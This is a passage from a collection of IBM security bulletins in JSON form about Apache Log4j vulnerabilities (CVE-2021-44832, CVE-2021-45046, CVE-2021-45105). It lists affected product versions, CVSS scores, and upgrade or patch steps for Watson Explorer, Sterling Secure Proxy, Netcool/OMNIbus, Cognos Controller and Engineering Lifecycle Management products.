\n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 Analytical Components](<https://www.ibm.com/support/pages/node/6539808>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| 12.0.0.0, 12.0.0.1, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 oneWEX](<https://www.ibm.com/support/pages/node/6539804>) for download information and instructions. \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n\nSee [Watson Explorer Version 11.0.2.13 Foundational Components](<https://www.ibm.com/support/pages/node/6539814>) for download information and instructions. \n \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n \nSee [Watson Explorer Version 11.0.2.13 Analytical Components](<https://www.ibm.com/support/pages/node/6539816>) for download information and instructions. \n \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3| \n\n 1. If you have not already installed, install Version 12.0.3. For information about Version 12.0.3, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/docview.wss?uid=ibm10880811>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.0&platform=All&function=all>): **12.0.3.0-WS-WatsonExplorer-DAEAnalytical-CAStudio-IF002.**\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. 
Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2| \n\n 1. If you have not already installed, install Version 11.0.2.2. \n\n * For information about Version 11.0.2, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/pages/node/724425>).\n * For information about upgrading, see the [upgrade procedures](<http://www.ibm.com/support/docview.wss?uid=swg27049072>).For information about Version 11.0.2.2, see the [download document](<http://www.ibm.com/support/docview.wss?uid=swg24044331>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.2&platform=All&function=all>): **11.0.2.2-WS-WatsonExplorer-AEAnalytical-CAStudio-IF002**.\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. 
Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T12:14:51", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM Watson Explorer is vulnerable to arbitrary code execution (CVE-2021-44832, CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T12:14:51", "id": "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "href": "https://www.ibm.com/support/pages/node/6540528", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:25", "description": "## Summary\n\nIBM Sterling Secure Proxy is vulnerable to arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). 
The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Sterling Secure Proxy| 6.0.2 \nIBM Sterling Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus Build 446| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \nIBM Sterling Secure Proxy| 6.0.2.0| iFix 04 Plus Build 232| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 6.0.3.0| iFix 01 Plus Build 142| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \n \n \nThe [Fix Central - 
6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link also points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:05:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling Secure Proxy (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:05:15", "id": "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "href": "https://www.ibm.com/support/pages/node/6538674", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:11", "description": "## Summary\n\nThe 
Netcool/Omnibus 'Administrator GUI' and 'Operator GUI' desktop components use a version of Apache Log4j that contains known vulnerabilities. These vulnerabilities have been addressed by an upgrade to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nNetcool/OMNIbus| 8.1.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability by applying the fix below: \n\n**_Product_**| **_VRMF_**| **_APAR_**| _ **Remediation/Fix** \n_ \n---|---|---|--- \nOMNIbus| 8.1.0.28| IJ36852| <https://www.ibm.com/support/pages/node/6527268> \n \n## Workarounds and Mitigations\n\nIBM recommends installing Tivoli Netcool/OMNIbus 8.1.0 fix pack 8.0.1.28 or later.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-01T11:47:35", "type": "ibm", "title": "Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-01T11:47:35", "id": "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "href": "https://www.ibm.com/support/pages/node/6552546", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:53", "description": "## Summary\n\nIBM Cognos Controller is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Controller has upgraded Apache Log4j to v2.17.1. Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.4.2\n\n## Remediation/Fixes\n\nIf you have the listed affected version, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Cognos Controller 10.4.2 IF17 from Fix Central](<https://www.ibm.com/support/pages/node/6540652> \"Download IBM Cognos Controller 10.4.2 IF17 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\nRemediation for IBM Cognos Controller on Cloud has completed.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Controller team developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers. \n\nTo get the patch and detailed instructions, click this link: [IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around](<https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-LOG4J-WORK-AROUND:0&includeSupersedes=0&source=fc&login=true> \"IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around\" )\n\nThe patch is applicable to IBM Cognos Controller version 10.4.2. 
\n\nThe instructions will guide you to replace the log4j vulnerable files manually without impacting your current product version. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T20:04:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller 10.4.2 IF17: Apache Log4j vulnerability (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-15T20:04:06", "id": "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "href": "https://www.ibm.com/support/pages/node/6540664", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:34", "description": "## Summary\n\nIBM Tivoli Netcool/OMNIbus Common Integration Libraries is vulnerable to arbitrary code execution and denial of service due to Apache Log4j as part of the logging functionality. These vulnerabilities have been addressed. 
The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. 
By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus Integration - Transport Module Common Integration Library | common-transportmodule-12_0 up to and including common-transportmodule-33_2 \nIBM Tivoli Netcool/OMNIbus Integration - Java Netcool Utility Library | common-jnetcool-7_0 up to and including common-jnetcool-8_2 \n \n## Remediation/Fixes\n\nIBM strongly recommends fixing the vulnerabilities now by upgrading. \n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus Integration - Transport Module Common Integration Library | [common-transportmodule-33_4](<https://www.ibm.com/support/pages/node/256461> \"common-transportmodule-33_4\" ) \nIBM Tivoli Netcool/OMNIbus Integration - Java Netcool Utility Library | [common-jnetcool-8_4](<https://www.ibm.com/support/pages/node/255019> \"common-jnetcool-8_4\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T01:45:15", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool/OMNIbus Common Integration Libraries is vulnerable to arbitrary code execution and denial 
of service due to Apache Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T01:45:15", "id": "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "href": "https://www.ibm.com/support/pages/node/6551310", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:26", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which is used by the IBM Engineering Lifecycle Management products for logging . The fix includes upgrade to Apache log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe following IBM Engineering Lifecycle Management products (IBM Jazz Team Server based Applications) are affected: Collaborative Lifecycle Management (CLM), Engineering Lifecycle Management (ELM), IBM Engineering Workflow Management (EWM), IBM Engineering Test Management (ETM), Global Configuration Management (GCM), IBM Engineering Lifecycle Optimization - Engineering Insights (ENI), IBM Engineering Systems Design Rhapsody \u2013 Model Manager(RMM), IBM Jazz Reporting Service (JRS), IBM Engineering Requirements Management DOORS Next(DNG).\n\nPlease find the affected components and remediations for each affected product and version in the table below. \n\n\n**Version(s)**| **Affected Product(s)**| **Remediation (Refer to the Step number in the Remediation Section) \n** \n---|---|--- \n6.0.6| Collaborative Lifecycle Management (CLM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | #4 \nRational DOORS Next Generation(RDNG)| | #2| | \nRational Engineering Lifecycle Manager (RELM)| | #2| | \nRational Rhapsody Model Manager (RMM)| | #2| | \nRational Quality Manager (RQM)| | #2| | \nRational Team Concert (RTC)| | #2| | \n6.0.6.1| Collaborative Lifecycle Management (CLM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | #4 \nRational DOORS Next Generation(RDNG)| | #2| | \nRational Engineering Lifecycle Manager (RELM)| | #2| | \nRational Rhapsody Model Manager (RMM)| | #2| | \nRational Quality Manager (RQM)| | #2| | \nRational Team Concert (RTC)| | #2| | \n7.0| IBM Engineering Requirements Management DOORS Next(DNG)| | #2| | \nEngineering Lifecycle Management (ELM)| | #2| | \nIBM Engineering Lifecycle Optimization - Engineering Insights (ENI)| | #2| | \nIBM Engineering Test Management (ETM)| | #2| | \nIBM Engineering Workflow Management (EWM)| | #2| | \nGlobal 
Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | \nIBM Engineering Systems Design Rhapsody - Model Manager (RMM)| | #2| | \n7.0.1| IBM Engineering Requirements Management DOORS Next(DNG)| | #2| | \nEngineering Lifecycle Management (ELM)| | #2| #3| \nIBM Engineering Lifecycle Optimization - Engineering Insights (ENI)| | #2| | \nIBM Engineering Test Management (ETM)| | #2| | \nIBM Engineering Workflow Management (EWM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | \nIBM Engineering Systems Design Rhapsody - Model Manager (RMM)| | #2| | \n7.0.2| Engineering Lifecycle Management (ELM)| | | #3| \nIBM Engineering Requirements Management DOORS Next(DNG)| #1| | | \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nNote: This bulletin supersedes bulletin: <https://www.ibm.com/support/pages/node/6527732>\n\nNote: If you integrate any of the IBM Jazz Team Server-based products and versions (6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2) listed above with IBM WebSphere Application Server (WAS), you will want to review the IBM WebSphere Application Server (WAS) remediation [guidance](<https://www.ibm.com/support/pages/node/6538722> \"guidance\" ).\n\n1 - For **IBM Engineering Requirements Management DOORS Next (DNG)** Version 7.0.2 only. Click this [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS+Next&release=7.0.2&platform=All&function=fixId&fixids=7.0.2-IBM-ELM-iFix010&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Link\" ) to install iFix010 or newer. Note: if you previously installed the Log4j patch patch_Log4Shell_DNv4.zip, you will need to remove it first. 
